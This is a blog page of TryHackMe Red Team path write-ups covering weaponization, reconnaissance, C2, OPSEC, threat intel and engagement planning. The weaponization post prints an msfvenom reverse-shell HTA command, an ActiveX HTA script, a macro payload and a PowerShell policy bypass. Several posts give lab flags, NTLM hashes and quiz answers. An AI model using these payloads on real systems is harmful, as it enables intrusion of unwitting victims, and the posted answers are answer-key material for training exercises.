Category: TryHackMe

About TryHackMe

Hello world, welcome to Haxez. TryHackMe is an online platform designed to teach and enhance cybersecurity skills. It provides a safe and legal environment for individuals and organizations to learn and practice in various cybersecurity domains. The platform offers interactive and engaging challenges and labs, providing hands-on experience.

TryHackMe Learning Paths

Users can select from several learning paths, which are comprehensive and easy-to-follow guides for specific domains. They include quizzes, video tutorials, and articles. Additionally, TryHackMe has a community of users and experts that actively collaborate to provide tips and techniques.

The platform offers organizations customizable training programs, providing employees with the best cybersecurity practices. Through training, organizations can improve their cybersecurity defences and reduce the risk of cyber attacks.

Moreover, TryHackMe hosts competitions and events, bringing together the community and providing opportunities for users to showcase their skills. It also offers a cyber range that simulates real-world scenarios to help users understand how cyber attacks work and how to prevent them.

Gamification

One of the unique features of TryHackMe is its gamified approach to learning. Users can earn points, badges, and rankings by completing challenges and labs. The rankings are designed to encourage users to learn and improve their skills continuously.

TryHackMe is a valuable resource for individuals seeking to improve their cybersecurity skills or organizations looking to train their employees. The interactive and engaging challenges and labs, comprehensive learning paths, active community, and gamified approach make it an excellent choice for anyone looking to improve their cybersecurity skills.

I like TryHackMe a lot, it has an easier learning curve than Hack The Box. Hack The Box labs don’t give you much to go on. THM will guide you through the process of enumerating the host, getting a foothold and then elevating yourself to root. It’s a lot of fun, especially their annual Advent Of Cyber event.

Red Team: Initial Access – Weaponization | Try Hack Me

Posted on October 27, 2022October 27, 2022 by Jonobi Musashi

Hello world and welcome to HaXeZ, in this post I’m going to be going through the Weaponization room on TryHackMe. Until now, the rooms haven’t been that hands-on. However, this room steps it up a bit and has us create payloads for exploiting machines. Consequently, i’m going to try and reduce the reproduction of the content that THM has already created and focus on working through the solutions themselves.

Weaponization Cyber Kill Chain

The introduction to the room starts by explaining where weaponization falls within the cyber kill chain. Beneath, you can see from the image below, weaponization is the second stage. The image has been taken from TryHackMe.

Furthermore, the room explains that weaponization is the part of the engagement where the Red Teamer generates payloads to exploit the target. It then goes on to explain that some organizations block or monitor the execution of .exe files but that there are alternatives such as the ones listed below.

The Windows Script Host (WSH)
An HTML Application (HTA)
Visual Basic Applications (VBA)
PowerShell (PSH)

Windows Scripting Host Weaponization

Windows Operating Systems have a built-in tool to run batch files called Windows Scripting Host. Furthermore, this scripting host tool allows for the execution of certain scripts. The room challenges us to write a script that creates a context box that says “Welcome to THM”. This can be achieved with the following code which can then be double-clicked or run from the command line.

Dim message 
message = "Welcome to THM"
MsgBox message

Next, the room challenges you to produce a script that can launch the calculator. This is fairly simple as it provides the script you need to run. However, it then asks you to produce a script to launch cmd.exe by telling you to replace calc.exe with cmd.exe. Although, it seems that this didn’t work for me. I did a bit of googling but didn’t find a solution.

Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True

HTML Application Weaponization

HTML Applications are insanely cool. They allow you to create a file and host them on a web server for an unsuspecting victim to click and run. Therefore, if an unsuspecting victim gives the application permission to run, it can grant the attacker access to their machine. For example, the snippet of code below can be hosted using the Python HTTP module and if run by a victim would open a command prompt.

<html>
<body>
<script>
	var c= 'cmd.exe'
	new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>

Moreover, you can use msfvenom to create reverse shell payload HTA applications. Similarly, this can also be hosted on a web server and if run by the victim would grant the attacker access to their machine. For example, the code below can be used to create an HTA application with msfvenom.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.232.37 LPORT=443 -f hta-psh -o thm.hta

However, a far similar method of performing this type of attack is to the hta_server module in Metasploit. This module requires hardly any configuration and will automatically host the application for you. All the attacker would need to do is send the link to their victim and wait for them to run it.

Visual Basic for Application Weaponization

Visual Basic applications are another really cool way of delivering a payload. For example, Microsoft Office documents support macros which can be used to execute Visual Basic. Macros can be accessed by clicking View then macros. You then need to give the macro a name and the script to be executed. For example, the script below will run calc.exe.

Sub PoC()
	Dim payload As String
	payload = "calc.exe"
	CreateObject("Wscript.Shell").Run payload,0
End Sub

Visual Basic for Application Weaponization

There is a lot more to this section which you should definitely read through but this covers the basics. This is something I will definitely be adding to my list of exploits as it is very powerful if you can trick a user into running macros.

PowerShell Weaponization

PowerShell scripts are great for compromising machines. In fact, you can use PowerShell can execute a reverse shell directly or can download externally hosted payloads and execute that to create a reverse shell. However, one problem that we may face when executing PowerShell scripts is the execution policy. This can be overridden with the simple command below.

powershell -ex bypass -File thm.ps1

Command And Control – (C2 Or C&C)

This section of the room covers information about C2’s or Command and Control. However, we have covered these in more detail in the Intro to C2 room. It is good to read through this information to reinforce what was learned in the C2 room. There are no questions to answer here.

Delivery Techniques

This section of the room talks about the various delivery techniques used by threat actors. It’s fairly standard in that the usual suspects are present. It discusses email delivery, web delivery, and USB delivery. There is a great episode of Mr. Robot which demonstrates the effectiveness of USB delivery. Elliot drops a bunch of Rubber Duckys outside a police station. An officer picks up one of the USBs and plugs it into their computer. While the payload was caught by the antivirus, it does demonstrate how they can be used. If you’re looking for a way to make your own USB rubber ducky then check out my guide on how to use a Digispark.

Hack Any Computer In 2 Seconds With this £2 Device | Digispark

Practice Arena

In order to complete the practice arena, I used the hta_server Metasploit module that was mentioned previously. Furthermore, It didn’t require any configuration, all it needed was the URL that Metasploit automatically generates. Next, you paste the URL into the web application and it downloads and executes the payload. The flag can be found below. I would however strongly encourage you to do this yourself rather than copying and pasting the answer.

THM{b4dbc2f16afdfe9579030a929b799719}

Red Team: Initial Access – Red Team Reconnaissance | Try Hack Me

Posted on October 27, 2022October 27, 2022 by Jonobi Musashi

Hello world and welcome to HaXeZ, in this post I’m going to be discussing the Red Team Reconnaissance room on TryHackMe. This room focuses on the reconnaissance techniques used by Red Teamers to gather information about their target. To elaborate, the room covers the following topics:

The types of reconnaissance activities.
WHOIS and DNS-based reconnaissance.
Advanced searching.
Searching by image.
Google hacking.
Specialized search engines.
Recon-ng.
Maltego.

Taxonomy of Reconnaissance

This task discusses the two different types of reconnaissance that Red Team members use to profile their target.

Passive Reconnaissance

Firstly, it explains that passive reconnaissance is carried out without interacting with the target. Furthermore, it explains that this shouldn’t require sending a single packet to the target. This type of reconnaissance is known as Open Source Intelligence (OSINT). For example, querying domain and IP address information, and finding email addresses and employee names through social media sites like Linked In.

Active Reconnaissance

Active reconnaissance is the opposite of passive reconnaissance and the process of gathering information by interacting with the target. For example, using Nmap and other tools to scan their infrastructure to identify active services and weaknesses is considered active reconnaissance.

External Reconnaissance

External recon is anything that takes place outside the target’s network. It primarily focuses on externally facing infrastructure that is publically accessible from the internet. This could be anything from web servers to mail servers.

Internal Reconnaissance

Internal reconnaissance takes place within the target network. For example, this could be facilitated by the Red Teamer physically turning up to their building and accessing the network via a port. Although, it could be done remotely via a VPN solution into the network. This type of reconnaissance would utilize tools like Nessus, OpenVAS, and other vulnerability scanning tools to identify weaknesses within their network.

Built-In Reconnaissance Tools

This task focuses on learning to use built-in tools that most operating systems come with. These tools include:

Whois.
Dig.
Nslookup.
Host.
Traceroute/Tracert.

Whois

The first tool that is discussed in the room is whois. Whois is a tool for querying information about a domain name. This tool will return information about the WHOIS server, the registrar URL, the domain registration date, the expiration date, the registrant contact information. However, sometimes this information is protected via domain privacy so it can be hit and miss as to how much information you can get from it.

Nslookup

The next tool discussed in this room is nslookup. Nslookup is a tools used to query DNS records from the nameserver. I’ve covered DNS and nslookup in detail in one of my other posts https://haxez.org/2022/05/domain-name-system-simplified/. This tool can be useful to find hidden records.

Dig

Digg.com, how I miss your former self, what happened to you? Alas, dig has nothing to do with Digg.com but always makes me think about it whenever I use it. Dig, short for Domain Internet Groper is another tool used to query name servers for DNS records.

Host

Host is a tool used to resolve domain names to IP addresses. It does more than that but let’s keep it simple for now. It can query DNS servers for DNS records and show you what IP address those records resolve to.

Traceroute

If you’ve ever worked in technical support then it is likely that you know what a traceroute is. Essentially, it will trace your route to the specified target. Furthermore, it will show you the hops it takes to the target. This can be good for identifying connectivity issues.

There are a number of questions to answer. I would strongly recommend you go and find the answers to yourself but here we go. You can use the whois and host tools to get these answers so go do it instead of copying and pasting.

When was thmredteam.com created (registered)?
2021-09-24

To how many IPv4 addresses does clinic.thmredteam.com resolve?
2

To how many IPv6 addresses does clinic.thmredteam.com resolve?
2

Advanced Searching

This section of the room discusses advanced searching techniques. It explains how to use certain keywords to find specific search results. This can be used to find certain file types on specific websites. Furthermore, it can be used to find pages containing specific texts on specific websites. This technique is primarily known as Google Dorking but other search engines support this functionality. There isn’t much more to say about this section of the room, I have covered Google Dorking and other OSINT techniques here Hack To Learn: OSINT and Passive Reconnaissance

How would you search using Google for xls indexed for htttp://clinic.thmredteam.com?
filetype:xls site:clinic.thmredteam.com

How would you search using Google for files with the word passwords for http://clinic.thmredteam.com?
passwords site:clinic.thmredteam.com

Specialized Reconnaissance Search Engines

There are a number of specialized search engines that have been built specifically for gathering information about targets. These search engines range from performing DNS searches, Censys information, and a search for all internet-connected devices which allows the user to search via services and even vulnerabilities.

ViewDNS.info

ViewDNS.info is a website that has many different utilities for performing passive reconnaissance against the target. It reminds me of MX Toolbox due to the many different tools available. This is a good web application to have bookmarked for your reconnaissance phases.

This room also discusses the threatintelligenceplatform.com and https://search.censys.io/ web applications which I would highly recommend you check out. I won’t be going into much more detail in this write-up as the information is available on TryHackMe.

Shodan

Finally, the room talks about Shodan. Shodan is an amazing tool that gives the user Mr. Robot-like powers. It allows you to perform searches for internet-connected devices but has a number of powerful search operators. Additionally, these operators allow the user to filter results based on variables like geographical location, operating system, services available, and many others.

What is the shodan command to get your Internet-facing IP address?
shodan myip

Recon-ng Reconnaissance

Recon-ng can be compared to Metasploit in that it is a framework. However, it is a framework for Open source Intelligence rather than exploitation. It offers a number of features including the ability to create workspaces for your target. Furthermore, it can also be linked to a database to save information about the target. It also has a marketplace that you can use to search for and install tools. Please see the video at the end of the post for a demonstration of this tool.

This room has a number of questions that you should try to answer yourself. However, I have provided the answers below as it’s always good to have a reference.

How do you start recon-ng with the workspace clinicredteam
recon-ng -w clinicredteam

How many modules with the name virustotal
2

here is a single module under hosts-domains. What is its name?
migrate_hosts

censys_email_address is a module that “retrieves email addresses from the TLS certificates for a company.” Who is the author?
Censys Team

Maltego Reconnaissance

Maltego is a fantastic tool that allows you to rapidly perform Open Source Intelligence gathering against your target. For example, you can input a domain name and then use one of the many transforms available. These transforms use open-source platforms such as search engines to gather information about the target. They can return entities like server IP addresses, mailboxes, and many others. The community edition limits you to a set number of transform results but it is still very powerful and a fun tool to check out. Please check out my OSINT video for a demonstration https://www.youtube.com/watch?v=csZaWzFhmCs.

Conclusion

This was a fun room that taught me a few things I didn’t know about reconnaissance. I realize that this post is poorly regurgitating the information available on TryHackMe. These posts are mainly for my benefit as it helps me to reinforce my learning by using multiple methods of consuming the information. If I create a video and a write-up about it then there is no way I will forget it right? Anyway, let me know what you thought about the room, and please check out the video below.

Red Team Part 5 – Intro to C2 | TryHackMe

Posted on September 13, 2022September 13, 2022 by Jonobi Musashi

Hello world and welcome to HaXeZ where today we’re going to be getting a bit more technical and looking at C2s. To clarify, C2 is short for Command and Control and is a central location from which to control all your compromised devices. If you’re interested in Red Team engagements or cybersecurity in general then head over to TryHackMe and level up your skills.

Task 1 – Introduction

As with most first rooms on TryHackMe, the first room is an introduction room and explains what is going to be covered. Not much to talk about here other than that we will be covering how Command and Control Frameworks work. Then, we will cover the various components that Command and Controls use. After that, we will cover the basic setup of a Command and Control Framework. Furthermore, the room covers how to use Armitage and Metasploit.

Task 2 – Command and Control Framework Structure

This section of the room has a lot of information to digest. In short, the room explains what a Command and Control Framework is, the structure of a Command and Control, how to obfuscate agent callbacks, payload types, and a lot more. Overall, the information contained in this section is essential. For example, it explains that a C2 agent is similar to a Netcat reverse shell. Furthermore, it elaborates on beacons and explains how beacons are callbacks to the main Command and Control server and that unless confiscated can be easily recognized.

Question: What is the component's name that lives on the victim machine that calls back to the C2 server?
Answer: Agent

Question: What is the beaconing option that introduces a random delay value to the sleep timer?
Answer: Jitter

Question: What is the term for the first portion of a Staged payload?
Answer: Dropper

Question: What is the name of the communication method that can potentially allow access to a restricted network segment that communicates via TCP ports 139 and 
Answer: SMB Beacon

Task 3 – Common C2 Frameworks

Next, task 3 discusses the various different Command and Control frameworks. It breaks them down into free and premium versions. Notably, it covers Metasploit, Armitage, Powershell Empire, Covenant, and Sliver. It then covers the premium Command and Control frameworks such as Cobalt Strike and Brute Ratel.

Task 4 – Setting Up a C2 Framework

The next room covers how to set up a Command and Control Framework. Notably, it focuses on Armitage and how you can clone the framework from Gitlab. It then discusses how Metasploit needs to be set up correctly as Armitage heavily relies on Metasploit’s database. Furthermore, it explains how Armitage can be used by multiple people provided they have the IP address, port, username, and password. For more information on this section please refer to the video at the end.

Task 5 – C2 Operation Basics

The next section, section 5 covers C2 operation basics. Furthermore, it explains how best to hide your C2 server from those pesky Blue Team security analysts. It discusses how Cobalt Strike servers could be easily identified due to an additional space in the HTTP header. Moreover, it explains how things like Cloudflare and virtual hosts can be used to hide your C2 server.

Question: Which listener should you choose if you have a device that cannot easily access the internet?
Answer: DNS

Question: Which listener should you choose if you're accessing a restricted network segment?
Answer: SMB

Question: Which listener should you choose if you are dealing with a Firewall that does protocol inspection?
Answer: HTTPS

Task 6 – Command, Control, and Conquer

Section 6 of this room covers using Armitage to exploit hosts. In particular, it walks through performing a Nmap scan against the vulnerable virtual machine Blue. Consequently, the host is vulnerable to the Eternal Blue vulnerability which you can then exploit through Armitage. Once the exploit is complete you can then perform a post-exploitation investigation directly through the terminal. Again, see the video at the end for more information.

Question: What flag can be found after gaining Administrative access to the PC?
Answer: THM{bd6ea6c871dced619876321081132744}

Question: What is the Administrator's NTLM hash?
Answer: c156d5d108721c5626a6a054d6e0943c

Question: What flag can be found after gaining access to Ted's user account?
Answer: THM{217fa45e35f8353ffd04cfc0be28e760}

Question: What is Ted's NTLM Hash?
Answer: 2e2618f266da8867e5664425c1309a5c

Task 7 – Advanced C2 Setups

This section of the room covers advanced C2 setups. It goes into more detail about setting up Apache and virtual hosts. These efforts are to attempt to avoid detection by a security analyst which could result in the server getting reported and shut down. This section has some great advise on how you can configure the Apache server to only respond with the C2 if the header include a certain User Agent.

Task 8 – Wrapping Up / Conclusions

The last room in the series summarizes what was covered in the room and how to choose a framework. I thoroughly enjoyed this room as I was recently looking at C2s and couldn’t find one I liked. I looked at Chaos but had a lot of issues getting it to work. Nevertheless, this room has been educational and has pointed me in the right direction on how to set up and use a full-fledged C2.

Red Team Part 4 – Red Team OPSEC | TryHackMe

Posted on September 12, 2022September 12, 2022 by Jonobi Musashi

Hello world and welcome to HaXeZ, where today we’re continuing the Red Team path on TryHackMe and looking at OPSEC. In essence, TryHackMe is a digital playground that lets you level up and test out your hacking skills. For this reason, I would recommend everyone who is interested in Cybersecurity and hacking go and check it out as there is always something new to learn.

Task 1 – Introduction

The first task in this room is the standard introduction room. Although, this task does actually have more technical information than the previous introduction rooms. The author discusses a term coined by the United States military known as OPSEC. Furthermore, they explain how OPSEC can be broken down into five steps: Critical Information, Threats, Vulnerabilities, Risks, and Countermeasures.

Task 2 – Critical Information Identification

The next task discusses critical information identification. Moreover, the author explains what a Red Team might consider critical information. For example, things like the Red Team’s capabilities, activities, and limitations could be considered critical information if the Blue Team knew it.

THM{OPSEC_CRITICAL_INFO}

Task 3 – Red Team Threat Analysis

The subject of task 3 is threat analysis and explains that threat analysis can be broken down into the following questions.

Who is the adversary?
What are the adversary’s goals?
What tactics, techniques, and procedures does the adversary use?
What critical information has the adversary obtained, if any?

With that in mind, the author discusses how the Blue Team could be considered a threat. To explain, if the Blue Team were to learn of the TTP’s of the Red Team then they would be able to mitigate them.

Task 3 - Red Team Threat Analysis — Task 3 – Red Team Threat Analysis

Task 4 – Vulnerability Analysis

The fourth task discusses vulnerability analysis but not in the traditional sense of computer analyzing system vulnerabilities. In short, OPSEC vulnerability analysis is analyzing when an adversary can obtain critical information, analyze findings and act in a way that would jeopardize your plan.

Task 5 – Red Team Risk Assessment

The purpose of a Red Team risk assessment is, funnily enough, to assess risk. The author explains that the risk could be using the same IP address to perform Nmap scans, exploit with Metasploit and run a phishing campaign. Consequently, if a member of the Blue Team were to identify a single IP address, they could block it and disrupt all operations.

Task 6 – Countermeasures

In task 6 the author discusses countermeasures. Specifically, they discuss the previous example of scanning, exploiting, and phishing from the same IP address. In short, they explain that countermeasures should be deployed so that not all areas will be affected if one IP address gets blocked.

Task 7 – More Practical Examples

While the information in this section was great, I thought the questions were awful. I will expand upon that in a moment. This section covers more practical examples such as disguising your computer’s operating system so it isn’t easily identified as a threat. The information here is great, it explains how changing your hostname so that it isn’t something like Kali2021vm or Attack Box would be a good step. However, the questions in this room seemed unnecessarily obscure. If your questions are difficult due to the way they are worded and how you answer them then are you really testing the reader’s knowledge? It may just be me but these questions slowed my progress significantly as it wasn’t immediately obvious which answer belong to which and how to even answer the questions.

Task 8 – Red Team OPSEC Summary/Conclusions

With the exception of the questions in Task 7, I enjoyed this room a lot. It allowed me to think about the Red Team from a different perspective. It was interesting to follow the thought process of a Red Team having to keep their own stuff secure and analyze their own risks. It’s easy to overlook this side of things as the Red Team is the offensive team and it hadn’t occurred to me that they too need to play defensively. Anyway, great room. I hate to criticize the questions in task 7, the creator is far more knowledgeable than me and the content thus far has been amazing. However, that section completely interrupted the flow of the room.

Red Team Part 3 – Red Team Threat Intel | TryHackMe

Posted on September 12, 2022September 12, 2022 by Jonobi Musashi

Hello world and welcome to HaXeZ, in this post we’re going to be walking through the 3rd Red Team challenge in the Red Team Fundamentals room on Try Hack Me. Moreover, this room covers how a Red Team uses the TTP’s of known APT to emulate attacks by an advisory.

Task 1 – Introduction

The first room is as expected, the introduction. Ultimately, this section of the room explains what will be covered. In summary, it covers the basics of threat intelligence, creating threat-intel-driven campaigns, and using frameworks.

Task 2 – What is Threat Intelligence

Next, the author talks about threat intelligence and how collecting indicators of compromise and TTPs is good for Cyber Threat Intelligence. Furthermore, it explains that there are intelligence platforms and frameworks such as ISAC that can provide this information.

Task 3 – Applying Threat Intel to the Red Team

The third task explains how teams can use Cyber Threat Intelligence (CTI) to aid in adversary emulation. Additionally, it explains how frameworks such as Mitre ATT&CK and Tiber-EU can be used to map the TTP’s of the adversary to known cyber kill chains.

Task 4 – The TIBER-EU Framework

The Tiber-EU framework was developed by the European Central bank and focuses on the use of threat intelligence. As can be seen, they have broken the steps down into three sections, Preparation, Testing, and Closure. Generally speaking, this matches up with other Cyber Kill Chains.

Task 5 – TTP Mapping

Tactics, techniques, and procedures are the skills that advanced persistent threats tend to be attributed with. Because of that, databases have been created showing the various TTP’s used by specific APT’s. Furthermore, these TTP’s can be mapped to the Cyber Kill chain which makes it easier for Red Teams to plan out an engagement where they are emulating an APT.

Question: How many Command and Control techniques are employed by Carbanak?
Answer: 2

Question: What signed binary did Carbanak use for defense evasion?
Answer: Rundll32

Question: What Initial Access technique is employed by Carbanak? 
Answer: Valid Accounts

Task 6 – Other Red Team Applications of CTI

Although we have already discussed emulating an APT, this task covers it in more detail. For example, it discusses how a Red Team would emulate C2 user traffic, ports and protocols, and listener profiles. Additionally, the author explains how manipulating host headers, POST URI, and server response headers can also be used to emulate an APT.

Task 7 – Creating a Threat Intel-Driven Campaign

The purpose of this task is to help the reader better understand how threats can map to the cyber kill chain. While the room started off well, I couldn’t get along with the first question. To explain, the reader is tasked with looking through the information pertaining to a specific APT. The reader then needs to map the TTP’s to layers in the cyber kill chain. Nevertheless, I struggled with this as none of the answers I was putting seemed to be correct.

Question: Once the chain is complete and you have received the flag, submit it below.
Answer: THM{7HR347_1N73L_12 _4w35om3}

Question: What web shell is APT 41 known to use? 
Answer: ASPXSpy

Question: What LOLBAS (Living Off The Land Binaries and Scripts) tool does APT 41 use to aid in file transfers? 
Answer: certutil

Question: What tool does APT 41 use to mine and monitor SMS traffic? 
Answer: MESSAGETAPc

Task 8 – Red Team Threat Intel Conclusion

The conclusion of this room explains what we have learned. I won’t recite it word for word but I will provide my own conclusion. I was quite surprised to learn that there was such emphasis on emulating real advanced persistent threats. Granted, that would be the goal of an engagement but I didn’t think a team would go to such lengths to plan out an engagement. I enjoyed this room except for the questions in task 7.

Red Team Part 2 – Red Team Engagements | TryHackMe

Posted on September 10, 2022September 10, 2022 by Jonobi Musashi

Hello world and welcome to Haxez, in this post I’m going to be talking about Red Team Engagements. Again, for those who haven’t been following along, this is the Red Teaming learning path on TryHackMe. Furthermore, If you’re interested in cybersecurity or hacking then I would highly recommend giving it a look.

Task 1 – Red Team Engagements Introduction

As with most of the educational rooms on TryHackMe, the first room introduces the topic being discussed. Notably, it discusses the different types of Red Team engagements whether its a Tabletop exercise, Adversary emulation, or Physical assessment. Furthermore, it goes on to explain what the following tasks are going to discuss. Not much more to say about the task than that. There is a “question” in this room but it doesn’t require an answer.

Task 2 – Defining Scope and Objectives

The second task in the room focuses on defining the scope and objectives. Including, why it is important to agree upon the scope with the client. It discusses how and why IP ranges, domain names, and other information should be included. Additionally, it discusses why it is important to understand the client’s objectives.

Question: What CIDR range is permitted to be attacked?
Answer: 10.0.4.0/22

Question: is the use of white cards permitted? (Y/N)
Answer: Y

Question: Are you permitted to access "*.bethechange.xyz?" (Y/N)
Answer: N

Task 3 – Rules of Engagement

The next task in the room discusses the rules of engagement document. In essence, the rules of engagement documents are exactly that. They are legally binding contracts outlining what the client’s objectives are. Furthermore, they explain the scope of the engagement. Additionally, they include all the stakeholders.

Question: How many explicit restrictions are specified?
Answer: 3

Question: What is the first access type mentioned in the document?
Answer: Phishing

Question: Is the red team permitted to attack 192.168.1.0/24? (Y/N)
Answer: N

Task 4 – Red Team Campaign Planning

The next task in the room is titled campaign planning. In summary, it explains how each Red Team engagement can be broken down into four plans. The engagement plan contains all the technical requirements. An operations plan is an expansion of the engagement plan but goes into further details. A mission plan that includes the exact commands to run and at what time. The remediation plan which contains information on what happens once the campaign has finished. There are no questions in this room.

Task 5 – Engagement Documentation

The fifth task in the room further elaborates on the planning phase by discussing the engagement documentation. Furthermore, the engagement documentation matches up with the planning phase accordingly. The author discusses what each of the documents may contain but that this may vary from organization to organization. If you’ve worked in the IT industry for a while, you will understand that each company does things differently.

Task 6 – Concept of Operation

Further expanding on the engagement documentation, task 6 explains the Concept of Operation (CONOPS) document. In essence, the CONOPS document contains can be compared to a penetration test executive summary. For example, an executive summary is a high-level document aimed at executives who may not have a high technical understanding. It further explains that it should include the client’s name, timeframe, objectives, and tools to be used.

Task 6 - Red Team Concept of Operation — Task 6 – Concept of Operation

Task 7 – Resource Plan

The resource plan discussed in task 7 is a document that details the overview of the dates and resource requirements. However, this document should be written as a bulleted list rather than a summary. Furthermore, there is no defined standard for this document. It is likely that these documents will vary from company to company.

Task 7 - Red Team Resource Plan — Task 7 – Resource Plan

Question: When will the engagement end? (MM/DD/YYYY)
Answer: 11/14/2021

Question: What is the budget the red team has for AWS cloud cost?
Answer: $1000

Question: Are there any miscellaneous requirements for the engagement? (Y/N)
Answer: N

Task 8 – Operations Plan

An operations plan is a document that provides details on the engagement and what will take place. This document should be more detailed than the CONOPS document and may possibly contain the Rules of Engagement document. Furthermore, it too should be a bulleted list like the resource plan. It should include things like stopping conditions, assigned personnel, TTP’s, and communication plans.

Task 8 - Red Team Operations Plan — Task 8 – Operations Plan

Question: What phishing method will be employed during the initial access phase?
Answer: Spearphishing

Question: What site will be utilized for communication between the client and red cell?
Answer: vectr.io

Question: If there is a system outage, the red cell will continue with the engagement. (T/F)
Answer: F

Task 9 – Mission Plan

The 9th task in this room discusses the mission plan document. In essence, this document is specific to each cell and the details should be completed by the operators. Furthermore, the document should cover the objectives, operators, exploits, targets, and execution plan.

Question: When will the phishing campaign end? (mm/dd/yyyy)
Answer: 10/23/2021

Question: Are you permitted to attack 10.10.6.78? (Y/N)
Answer: N

Question: When a stopping condition is encountered, you should continue working and determine the solution yourself without a team lead. (T/F)
Answer: F

Task 10 – Red Team Engagements Conclusions

The last task in the room is the conclusion. There isn’t much to say about this so I will use this section to give my own conclusions. Granted the information in these tasks isn’t exactly fun like hands-on labs. However, I appreciate the material for what it is. It doesn’t just teach you the technical skills needed to be a Red Team operator, it teaches you the process and procedures too. A lot of online learning resources tend to fail in this area by not being able to strike a good balance. TryHackMe excels in giving you both sides of the information.

Red Team Part 2 – Red Team Engagements | TryHackMe

Red Team Part 1 – Red Team Fundamentals | TryHackMe

Posted on September 9, 2022September 9, 2022 by Jonobi Musashi

Hello world and welcome to Haxez, in this post I’m going to be going through the first room in the Red Team learning path on TryHackMe. The first room doesn’t require a lot of technical skills. It is mostly just reading and getting to grips with the terminology of what a Red Team is.

Task 1 – Red Team Introduction

The first task in the series doesn’t require you to answer any questions. It is just an introduction in to the path and talks about some very basic principles of Red Team engagements. It explains that they are better than standard Penetration Tests and Vulnerability Assessments. Furthermore, the lab ends with just having to acknowledge that you have read the material.

Task 2 – Vulnerability Assessment and Penetration Tests Limitations

The second task further elaborates on the differences between Penetration Tests, Vulnerability Assessments, and Red Team engagements. Furthermore, it goes on to talk about the constraints of Penetration Tests and Vulnerability Assessments. How things like time, budget, scope, disruption, and the heavy focus on technology limit the effectiveness of those tests.

Question: Would vulnerability assessments prepare us to detect a real attacker on our networks? (Yay/Nay)

Answer: Nay

Question: During a penetration test, are you concerned about being detected by the client? (Yay/Nay)

Answer: Nay

Question: Highly organized groups of skilled attackers are nowadays referred to as …

Answer: Advanced Persistent Threats

Task 3 – Red Team Engagements

Task 3 goes on to talk about the engagements themselves and how they borrowed the name from the military. Furthermore, it introduces the terms Tactics, Techniques, and Procedures, or TTPs for short. It explains how the goal of an engagement is to capture the Crown Jewels or flags. Furthermore, it also explains how Red Team engagements cover more than just vulnerability scanning. It covers the technical infrastructure, social engineering, and physical intrusion such as turning up and trying to bypass on-site security. However, it doesn’t end there. Additionally, the author talks about the different types of exercises such as full engagement, assumed breach, and tabletop exercises.

Question: The goals of a red team engagement will often be referred to as flags or…

Answer: crown jewels

Question: During a red team engagement, common methods used by attackers are emulated against the target. Such methods are usually called TTP. What does TTP stand for?

Answer: Tactics, techniques, and procedures

Question: The main objective of a red team engagement is to detect as many vulnerabilities in as many hosts as possible (Yay/Nay)

Answer: Nay

Task 4 – Teams and Functions of an Engagement

The next task focuses on the structure of the different teams and the functions of the engagement. In reality, I believe that the desired structure of the team is seldom implemented. For example, it is more than likely that the team will consist of a Red Cell Lead and a Red Cell Operator. It would be desirable to have a Red Cell Assistant Lead but that often isn’t the case. As can be seen from the image below the author explains that there are three teams. The Red Team, the Blue Team, and the White Team. The Red Team is attacking, the blue team is defending (often without the knowledge of the attack) and the white team is playing middle man.

Question: What cell is responsible for the offensive operations of an engagement?

Answer: Red Cell

Question: What cell is the trusted agent considered part of?

Answer: White Cell

Task 5 – Engagement Structure

The objectives of task 5 are to educate the reader on the Cyber Kill Chain. As can be seen from the image below, the kill chain is made up of 7 different stages. Namely, recon, weaponization, delivery, exploitation, installation, command & control, and actions on objectives. Furthermore, it explains each of these stages and what their purpose is.

Question: If an adversary deployed Mimikatz on a target machine, where would they be placed in the Lockheed Martin cyber kill chain?

Answer: Installation

Question: What technique’s purpose is to exploit the target’s system to execute code?

Answer: Exploitation

Task 6 – Overview of a Red Team Engagement

Until now the tasks haven’t been very hands-on. However, this task asks you to assume the role of an attacker and walk through the different stages of an engagement. Furthermore, it has an interactive web application with great graphics that explains each step in detail. This is a really fun exercise, especially for those trying to build their technical skills.

Question: Click the “View Site” button and follow the example engagement to get the flag

Answer: THM{RED_TEAM_ROCKS}

Task 7 – Conclusion

Surely the room is harder than that? nope, that’s it. Once you have read through all that material and submitted your answers you’re done. Furthermore, you may be lucky enough to win some tickets for the competition which could allow you to net some swag.

Red Team Introduction – Try Hack Me

Posted on September 8, 2022September 8, 2022 by Jonobi Musashi

Hello World and welcome to HaXeZ, in this post I’m going to be talking about the new Red Team learning path produced by TryHackMe. TryHackMe is a digital playground that lets you learn and practice your hacking skills. They offer a vast catalog of learning material. I would recommend that any Cybersecurity practitioner sign up and have a go at it.

What is a Red Team

Unlike typical vulnerability scans or penetration test engagements, a Red Team engagement is where the security professional actively engages with the target. Whether it’s via phishing emails or physically visiting their facility and attempting to bypass security. It’s an engagement where the primary focus is exploiting the target. A Red Team engagement would highlight weaknesses that traditional tests wouldn’t. It would identify attack vectors that hackers would use which wouldn’t be considered during a regular assessment. Think sneakers or mission impossible.

Getting Started

As mentioned previously, TryHackMe offers a wide variety of study material and has just released a Red Teaming learning path. They offer other learning paths too like an introduction to Cybersecurity, Offensive Penetration Testing, and Defensive Cybersecurity. I have completed most of the learning paths and can honestly say that the material is top notch. You can sign up for free but the monthly subscription is affordable and the material available once subscribed is invaluable.

So, head to tryhackme.com and click the signup link. Once you have subscribed, head over to the Learn section at the top of the page and you will see the number of learning courses that they have to offer. Even if you have just stumbled upon this article and don’t have the skills to start the Red Team learning path right away, there are other learning paths to get you started.

Red Team Learning Path

The Red Team rooms offered by Try Hack Me range from the basics such as the Fundamentals all the way through to compromising Active Directory. I’m glad that this learning path came out as I was desperately wanting to try the Active Directory networks but was lacking motivation. However, now that I know that I get a certificate at the end of it I am 100% on board… That’s right, you get a certificate for completing the Red Team learning path. While these certificates may not have the notoriety that the Offensive Security certificates do, they are still worth putting on your resume.

Free Swag

But wait, there’s more. There is currently a competition of sorts running for people taking part in this course. Those who complete rooms will receive tickets. Those with the most tickets are in for a chance to win a number of different prizes including the Red Teamer title, some free lab time, a USB Rubber Ducky, A Wifi Pineapple, and even an OSEP exam voucher. There is literally no downside to signing up and leveling up your hacking skills.

Conclusion

